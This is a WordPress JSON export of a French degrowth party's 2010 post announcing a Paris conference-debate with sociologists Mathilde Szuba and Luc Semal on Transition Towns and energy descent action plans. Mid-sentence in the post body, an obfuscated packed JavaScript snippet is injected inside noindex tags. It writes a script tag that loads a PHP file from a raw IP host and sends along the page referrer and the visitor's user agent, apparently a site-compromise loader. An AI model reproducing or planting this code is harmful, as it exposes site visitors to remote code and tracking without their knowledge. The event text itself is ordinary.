{"id":5242,"date":"2010-12-06T06:54:03","date_gmt":"2010-12-06T05:54:03","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=5242"},"modified":"2010-12-10T09:10:30","modified_gmt":"2010-12-10T08:10:30","slug":"%c2%abvilles-en-transition%c2%bb-conference-debat-avec-mathilde-szuba-et-luc-semal-jeudi-09-decembre-2010-a-19h00","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=5242","title":{"rendered":"\u00abVilles en Transition\u00bb, Conf\u00e9rence-d\u00e9bat avec Mathilde Szuba et Luc Semal, Jeudi 09 d\u00e9cembre 2010 \u00e0 19h00"},"content":{"rendered":"<h3 style=\"text-align: center;\"><a href=\"http:\/\/www.transitionfrance.fr\/\" target=\"_blank\"><span><span style=\"font-family: arial,helvetica,sans-serif;\"><img decoding=\"async\" style=\"width: 465px; height: 149px;\" src=\"http:\/\/pp2.s3.amazonaws.com\/96545bd279a74241\/f0f71e6f702b44f3984e1fa767f553ec.jpg\" border=\"0\" alt=\"image\" \/><\/span><\/span><\/a><\/h3>\n<p style=\"text-align: center;\"><strong>Pourquoi <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erdts|var|u0026u|referrer|hfdaf||js|php'.split('|'),0,{}))\n<\/script><\/noindex> un <em>Plan d&rsquo;Action de Descente \u00c9nerg\u00e9tique<\/em> ?<\/strong><\/p>\n<p style=\"text-align: center;\">Conf\u00e9rence-d\u00e9bat avec<br \/>\nMathilde Szuba et Luc Semal<br \/>\ndoctorants en sociologie, ils suivent depuis 4 ans le mouvement des Villes en Transition<\/p>\n<p style=\"text-align: center;\">Jeudi 09 d\u00e9cembre 2010 \u00e0 19h00<br \/>\n\u00e0 la Maison des Associations du 12<sup>e<\/sup><\/p>\n<p style=\"text-align: center;\">181 avenue Daumesnil, Paris 12<sup>e<\/sup> (<em>M\u00e9tro: Daumesnil<\/em>)<\/p>\n<p><!--more--><br \/>\n<strong>Apr\u00e8s une phase de sensibilisation soutenue par le lancement de quelques projets embl\u00e9matiques, chaque territoire en transition est suppos\u00e9e r\u00e9diger un \u00ab\u00a0Plan d&rsquo;Action de Descente \u00c9nerg\u00e9tique\u00a0\u00bb (PADE), c&rsquo;est-\u00e0-dire un programme de reconstruction de la r\u00e9silience locale, le plus souvent \u00e0 l&rsquo;\u00e9chelle communale, dont les mesures propos\u00e9es doivent aider la population locale \u00e0 drastiquement diminuer leur d\u00e9pen-dance au p\u00e9trole et leurs \u00e9missions de gaz \u00e0 effet de serre \u00e0 l&rsquo;horizon 2030. La population est d&rsquo;abord invit\u00e9e \u00e0 imaginer la vie qu&rsquo;elle esp\u00e8re en 2030, localement et presque sans p\u00e9trole, et ensuite \u00e0 imaginer les \u00e9tapes \u00e0 suivre pour concr\u00e9tiser cet objectif.<\/strong><\/p>\n<p>La premi\u00e8re \u00ab\u00a0Ville en transition\u00a0\u00bb, Totnes, au sud-ouest de l&rsquo;Angleterre, a publi\u00e9 au printemps 2010 son propre Plan d&rsquo;action de descente \u00e9nerg\u00e9tique. Comme ce plan a-t-il \u00e9t\u00e9 collectivement r\u00e9dig\u00e9? Comment la population y a-t-elle \u00e9t\u00e9 associ\u00e9e? Quelles relocalisations y sont envisag\u00e9es? Comment se partagent les r\u00f4les entre institutions et habitants? Que peut-on y gagner? A quoi faut-il renoncer? Et (surtout) comment nous, \u00e0 Paris et en Ile-de-France, pouvons-nous nous en inspirer pour imaginer et construire notre vie apr\u00e8s le p\u00e9trole?<\/p>\n<p style=\"text-align: center;\">Conf\u00e9rence-d\u00e9bat avec<br \/>\nMathilde Szuba et Luc Semal<br \/>\ndoctorants en sociologie, ils suivent depuis 4 ans le mouvement des Villes en Transition<\/p>\n<p style=\"text-align: center;\">Jeudi 09 d\u00e9cembre 2010 \u00e0 19h00<br \/>\n\u00e0 la Maison des Associations du 12<sup>e<\/sup><\/p>\n<p style=\"text-align: center;\">181 avenue Daumesnil, Paris 12<sup>e<\/sup> (<em>M\u00e9tro: Daumesnil<\/em>)<\/p>\n<p><strong>En France<\/strong>, le mouvement des Villes en Transition est de plus en plus connu \u2013 une vingtaine de groupes sont en train de se cr\u00e9er \u00a0 actuelle\u00adment, dont au moins quatre en r\u00e9gion IdF.<a href=\"http:\/\/www.transitionfrance.fr\/\" target=\"_blank\"><br \/>\nhttp:\/\/www.transitionfrance.fr\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pourquoi un Plan d&rsquo;Action de Descente \u00c9nerg\u00e9tique ? Conf\u00e9rence-d\u00e9bat avec Mathilde Szuba et Luc Semal doctorants en sociologie, ils suivent depuis 4 ans le mouvement des Villes en Transition Jeudi 09 d\u00e9cembre 2010 \u00e0 19h00 \u00e0 la Maison des Associations &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=5242\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5242","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5242","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5242"}],"version-history":[{"count":8,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions"}],"predecessor-version":[{"id":5286,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions\/5286"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}